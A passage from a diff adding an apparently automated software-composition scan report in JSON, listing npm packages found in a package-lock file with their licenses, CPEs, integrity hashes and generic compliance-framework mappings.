"sha512-dowFkFTR8v79NPJO4QsBUtxv0g9BrS/phluVpMAt2ku7H+cbcBJlopXjkWlwxrk/xGqMemr7JkGPGemPrLLX7A==", + "dependencies": { + "@next/env": "14.2.3", + "@swc/helpers": "0.5.5", + "busboy": "1.6.0", + "caniuse-lite": "^1.0.30001579", + "graceful-fs": "^4.2.11", + "postcss": "8.4.31", + "styled-jsx": "5.1.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "35dad46b81d74be4", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: node-cron 3.0.3", + "title": "node-cron 3.0.3", + "description": "Package discovered: node-cron 3.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "5c4492e68f441264", + "name": "node-cron", + "version": "3.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:node-cron:node-cron:3.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:node-cron:node_cron:3.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:node_cron:node-cron:3.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:node_cron:node_cron:3.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:node:node-cron:3.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:node:node_cron:3.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/node-cron@3.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/node-cron/-/node-cron-3.0.3.tgz", + "integrity": "sha512-dOal67//nohNgYWb+nWmg5dkFdIwDm8EpeGYMekPMrngV3637lqnX0lbUcCtgibHTz6SEz7DAIjKvKDFYCnO1A==", + "dependencies": { + "uuid": "8.3.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "5d72f54e4946a64f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: node-fetch 2.7.0", + "title": "node-fetch 2.7.0", + "description": "Package discovered: node-fetch 2.7.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "71294da0e67ef2a3", + "name": "node-fetch", + "version": "2.7.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:node-fetch_project:node-fetch:2.7.0:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/node-fetch@2.7.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "dependencies": { + "whatwg-url": "^5.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2cbaa504cc478c46", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: node-forge 1.4.0", + "title": "node-forge 1.4.0", + "description": "Package discovered: node-forge 1.4.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c1e5f20287afef44", + "name": "node-forge", + "version": "1.4.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "(BSD-3-Clause OR GPL-2.0)", + "spdxExpression": "(BSD-3-Clause OR GPL-2.0)", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:digitalbazaar:forge:1.4.0:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/node-forge@1.4.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/node-forge/-/node-forge-1.4.0.tgz", + "integrity": "sha512-LarFH0+6VfriEhqMMcLX2F7SwSXeWwnEAJEsYm5QKWchiVYVvJyV9v7UDvUv+w5HO23ZpQTXDv/GxdDdMyOuoQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c9ae4bba0c53507d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: node-releases 2.0.38", + "title": "node-releases 2.0.38", + "description": "Package discovered: node-releases 2.0.38", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "157e4f935702d7be", + "name": "node-releases", + "version": "2.0.38", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:node-releases:node-releases:2.0.38:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:node-releases:node_releases:2.0.38:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:node_releases:node-releases:2.0.38:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:node_releases:node_releases:2.0.38:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:node:node-releases:2.0.38:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:node:node_releases:2.0.38:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/node-releases@2.0.38", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.38.tgz", + "integrity": "sha512-3qT/88Y3FbH/Kx4szpQQ4HzUbVrHPKTLVpVocKiLfoYvw9XSGOX2FmD2d6DrXbVYyAQTF2HeF6My8jmzx7/CRw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b468b7afcd57f5e8", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: nodemailer 6.10.1", + "title": "nodemailer 6.10.1", + "description": "Package discovered: nodemailer 6.10.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "bdc7a63994d0b28a", + "name": "nodemailer", + "version": "6.10.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT-0", + "spdxExpression": "MIT-0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:nodemailer:nodemailer:6.10.1:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/nodemailer@6.10.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-6.10.1.tgz", + "integrity": "sha512-Z+iLaBGVaSjbIzQ4pX6XV41HrooLsQ10ZWPUehGmuantvzWoDVBnmsdUcOIDM1t+yPor5pDhVlDESgOMEGxhHA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "eca5920a6d6c920a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: nopt 7.2.1", + "title": "nopt 7.2.1", + "description": "Package discovered: nopt 7.2.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "47f001cd3ecd3ee8", + "name": "nopt", + "version": "7.2.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:nopt:nopt:7.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/nopt@7.2.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/nopt/-/nopt-7.2.1.tgz", + "integrity": "sha512-taM24ViiimT/XntxbPyJQzCG+p4EKOpgD3mxFwW38mGjVUrfERQOeY4EDHjdnptttfHuHQXFx+lTP08Q+mLa/w==", + "dependencies": { + "abbrev": "^2.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b6fa9eec1e273eef", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: normalize-path 3.0.0", + "title": "normalize-path 3.0.0", + "description": "Package discovered: normalize-path 3.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "86c9c8fe4da1b72f", + "name": "normalize-path", + "version": "3.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:normalize-path:normalize-path:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:normalize-path:normalize_path:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:normalize_path:normalize-path:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:normalize_path:normalize_path:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:normalize:normalize-path:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:normalize:normalize_path:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/normalize-path@3.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", + "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0c9db30b81ebd770", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: normalize-svg-path 1.1.0", + "title": "normalize-svg-path 1.1.0", + "description": "Package discovered: normalize-svg-path 1.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2e420341fd4164af", + "name": "normalize-svg-path", + "version": "1.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:normalize-svg-path:normalize-svg-path:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:normalize-svg-path:normalize_svg_path:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:normalize_svg_path:normalize-svg-path:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:normalize_svg_path:normalize_svg_path:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:normalize-svg:normalize-svg-path:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:normalize-svg:normalize_svg_path:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:normalize_svg:normalize-svg-path:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:normalize_svg:normalize_svg_path:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:normalize:normalize-svg-path:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:normalize:normalize_svg_path:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/normalize-svg-path@1.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/normalize-svg-path/-/normalize-svg-path-1.1.0.tgz", + "integrity": "sha512-r9KHKG2UUeB5LoTouwDzBy2VxXlHsiM6fyLQvnJa0S5hrhzqElH/CH7TUGhT1fVvIYBIKf3OpY4YJ4CK+iaqHg==", + "dependencies": { + "svg-arc-to-cubic-bezier": "^3.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + 